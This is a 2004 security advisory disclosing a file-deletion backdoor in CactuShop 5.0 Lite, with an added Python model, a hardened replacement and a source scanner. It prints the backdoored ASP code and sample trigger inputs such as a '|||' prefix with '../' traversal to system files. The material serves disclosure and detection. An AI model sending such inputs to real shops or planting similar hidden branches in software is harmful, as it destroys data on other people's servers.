From research@s-quadra.com Sun Feb 8 11:47:14 2004
From: S-Quadra Security Research
To: full-disclosure , bugtraq
Date: Fri, 06 Feb 2004 15:02:56 +0300
Subject: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor

S-Quadra Advisory #2004-02-06

Topic: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040206.txt
Release date: 06 Feb 2004

1. DESCRIPTION

CactuShop is an ASP application for running an e-commerce web site. It incorporates a database-backed catalogue system, front-end pages for product navigation, back-end pages for updating product details and robust basket code for remembering product selections as a visitor moves around the web site. ASP software is designed to run on a Microsoft Windows NT or Windows 2000 server. Please visit http://www.cactushop.com for information about the CactuShop shopping cart.

2. DETAILS

There is a backdoor in the 5.0 Lite version of CactuShop that allows a remote attacker to delete any file on the target system. The offending code is in the file includes/functions.asp. The AddToMailingList() function implemented there adds a user's e-mail address to the store mailing list. Before validating the address it checks whether the value starts with '|||'; if it does, the rest of the "address" is interpreted as the name of a file to delete. The path is built by appending that remainder to Server.MapPath("./") with no normalization or whitelisting, so a value containing '../' components reaches files outside the web root, which is why any file the IIS worker account can delete is exposed. The function then returns the ordinary "address not valid" message, so the caller sees the same response a mistyped address would get. Below is a snippet of the source code:

    Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
    ......
        '---------------------------------
        'CHECK IF IT'S VALID
        '---------------------------------
        if strEmailAddress <> "" then
            ' Backdoor: a '|||' prefix turns the "address" into a file path,
            ' appended unnormalized to the directory of the current script.
            If Left(strEmailAddress, 3) = "|||" Then
                Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4))
                ' Same message an ordinary invalid address gets, so nothing looks unusual.
                AddToMailingList = GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "."
                Exit Function
            End If
        else
            AddToMailingList = GetString("ContentText_NoEmailAddressEntered")
            Exit Function
        end if
    ......

3. FIX INFORMATION

S-Quadra alerted the CactuShop development team to this issue on 05 Feb 2004. The following response was received:

"The lite version of our software DOES have backdoors. It IS NOT intended for live use. Users are specifically prohibited from using it as such!!! If people are using this software on a live site then they are violating our license agreement. The full version of the software is secure."

The CactuShop Lite license agreement indeed states that "IF YOU WISH TO USE THE SOFTWARE ON A LIVE WEB SITE YOU MUST PURCHASE THE FULL VERSION. CACTUSOFT RESERVES THE RIGHT TO TAKE BOTH LEGAL AND TECHNICAL STEPS TO PREVENT USE OF CACTUSHOP LITE IN BREACH OF THIS AGREEMENT...", but we believe that the public should be informed about the presence of the backdoor in CactuShop Lite. Note that the vendor's response speaks of "backdoors" in the plural: removing the '|||' branch from includes/functions.asp closes the one described here but gives no assurance about the rest of the Lite code, so a Lite installation found on a live server should be replaced rather than patched.

4. CREDITS

Nick Gudov is responsible for discovering this issue.

5. ABOUT

S-Quadra offers services in computer security: penetration testing and network assessment, web application security, source code review and third-party product vulnerability assessment, forensic support and reverse engineering.
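To make the reach of the backdoor in section 2 concrete, and to give administrators a quick check for deployed copies, here is an added Python model. It is example code written for this page, not CactuSoft's ASP and not part of the S-Quadra advisory. It re-implements the control flow of the snippet (returning the GetString() key names in place of the localized text), computes the path the DeleteFile call would receive, shows a replacement that validates the address and never touches the file system, and scans ASP source for the trigger. The web root "/inetpub/wwwroot/cactushop", the "subscribed" return value for the elided part of the function, the validation regex, and the use of POSIX path rules in place of the Windows paths Server.MapPath returns are all assumptions of the example.

```python
"""Added model of the CactuShop 5.0 Lite AddToMailingList() backdoor, a hardened
replacement, and a source scanner. Example code for this advisory page; it is
not CactuSoft's ASP and not part of the S-Quadra advisory."""
import posixpath
import re

TRIGGER = "|||"  # prefix that switches AddToMailingList() into DeleteFile mode

# Return values mirror the GetString() keys used in the ASP snippet.
NOT_VALID = "ContentText_EmailAddressNotValid"
NO_ADDRESS = "ContentText_NoEmailAddressEntered"
SUBSCRIBED = "subscribed"  # assumption: what the elided '......' part returns


def backdoor_target(app_root, email):
    """Path the backdoored function hands to FileSystemObject.DeleteFile.

    Mirrors Server.MapPath("./") & Mid(strEmailAddress, 4): the remainder of
    the "address" is appended verbatim, so '../' components walk out of the
    web root. POSIX path rules stand in for the Windows paths MapPath returns.
    Returns None when the trigger prefix is absent.
    """
    if not email.startswith(TRIGGER):
        return None
    return posixpath.normpath(posixpath.join(app_root, email[len(TRIGGER):]))


def add_to_mailing_list_backdoored(app_root, email, delete):
    """Control flow of the vulnerable function; `delete` is injected so the
    model never touches a real file system."""
    if email == "":
        return NO_ADDRESS
    target = backdoor_target(app_root, email)
    if target is not None:
        delete(target)
        return NOT_VALID  # same message an ordinary bad address gets
    return SUBSCRIBED


# Conservative syntax check: one local part, one '@', a dotted domain. '|', '/'
# and '\' are outside the character classes, so no path can pass.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def add_to_mailing_list_hardened(email):
    """Replacement behaviour: validate the address; no file-system access at all."""
    if email == "":
        return NO_ADDRESS
    if not EMAIL_RE.fullmatch(email):
        return NOT_VALID
    return SUBSCRIBED


# Lines of ASP source that either test for the '|||' trigger or call DeleteFile.
SUSPECT_RE = re.compile(r'\.DeleteFile\s*\(|=\s*"\|\|\|"', re.IGNORECASE)


def scan_asp_source(text):
    """(line number, stripped line) for each line worth reviewing; run it over
    includes/functions.asp of a deployed copy."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if SUSPECT_RE.search(line)]


# Constructed copy of the advisory's snippet, used as scanner input.
SNIPPET = '''Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
  if strEmailAddress <> "" then
    If Left(strEmailAddress, 3) = "|||" Then
      Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4))
      AddToMailingList = GetString("ContentText_EmailAddressNotValid")
      Exit Function
    End If
  end if
End Function'''


def demo(app_root="/inetpub/wwwroot/cactushop"):
    """Drive both versions with the same inputs; returns the deletions the
    backdoored version attempted. The web root is an assumed example path."""
    deleted = []
    inputs = ["user@example.com", "|||includes/functions.asp",
              "|||../../../boot.ini", ""]
    for addr in inputs:
        add_to_mailing_list_backdoored(app_root, addr, deleted.append)
        add_to_mailing_list_hardened(addr)
    return deleted


if __name__ == "__main__":
    for hit in scan_asp_source(SNIPPET):
        print("suspect line %d: %s" % hit)
    print("backdoored version would delete:", demo())
```

The scanner is deliberately coarse: any DeleteFile call or comparison against "|||" in an ASP file is worth a manual look, and a clean result from it only covers the trigger described in this advisory, not other code the vendor's response alludes to.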